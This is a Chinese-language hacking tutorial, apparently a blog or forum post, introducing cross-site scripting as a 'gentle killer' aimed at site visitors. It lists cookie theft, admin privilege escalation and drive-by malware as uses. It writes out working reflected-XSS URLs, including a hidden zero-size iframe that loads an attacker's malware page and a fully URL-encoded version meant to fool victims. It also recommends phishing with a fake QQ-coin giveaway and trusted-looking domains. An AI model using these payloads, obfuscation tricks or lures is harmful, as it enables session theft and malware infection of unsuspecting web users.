sql注射像一把利劍直接插入目標的胸膛,犀利得鋒芒畢露。接下來我們一起來看看跨站。我把她比作“溫柔殺手”,一把隱在背後的匕首。
引言之 跨站利用思維導向
sql注射是直接針對具有sql注射漏洞的系統,我們的目標很明確。而跨站的目標是 client——用戶端。即訪問者。這決定了其隱蔽性。
如何去思考利用一個跨站漏洞?
站在訪問者的角度去測試就可以很好的嘗試到這個溫柔殺手的威力。
1 document.cookie 盜取cookie資訊
2 非法許可權提升
3 掛馬
4 間接傷害(借刀殺人)
--------------------------------------------------------------------------------------
第一點是最常見的利用方式,而第二點主要還是針對網站管理員來設定的陷阱。這個利用方式需要在擷取程式源碼的一定程度上才能有效利用。第三點也比較常見。而第四點可能不太明白。舉個例子:
假設 www.wang1.cn 網一存在跨站漏洞
其漏洞頁面是 thead.php
構造:http://www.wang1.cn/thead.php?id=<script>alert("你中招了!")</script>
那麼我們把這個URL發給別人的時候,別人得到一個彈出框
再惡意點:我們配置一個網馬頁面 http://www.mama.com/index.htm
於是我們這樣構造:http://www.wang1.cn/thead.php?id=<iframe src=http://www.mama.com/index.htm width=0 height=0></iframe>
嘿嘿,別人訪問這個地址的時候得到的卻是我們的網馬頁面。
事實上,我們的欺騙還可以更加隱蔽一點,對url進行重新編碼:
http://www.wang1.cn/thead.php?id=%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%61%6D%61%2E%63%6F%6D%2F%69%6E%64%65%78%2E%68%74%6D%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E
這樣的話,一般人還真迷糊了。
問題來了:
誰會相信你直接存取你給的url地址呢?
答案:
信任構築於一個基本安全的環境。
假設 我們這個url的頭部是 http://www.163.com;www.qq.com。。。你還會懷疑嗎?
假如我們構建這樣一個頁面,慌稱qq最近有活動,贈送Q幣,然後大量發送精心構造的URL,有多少人會上當呢?
接下來的幾篇,我將逐一示範跨站技巧的一些運用。當然也歡迎網一會員提交文章。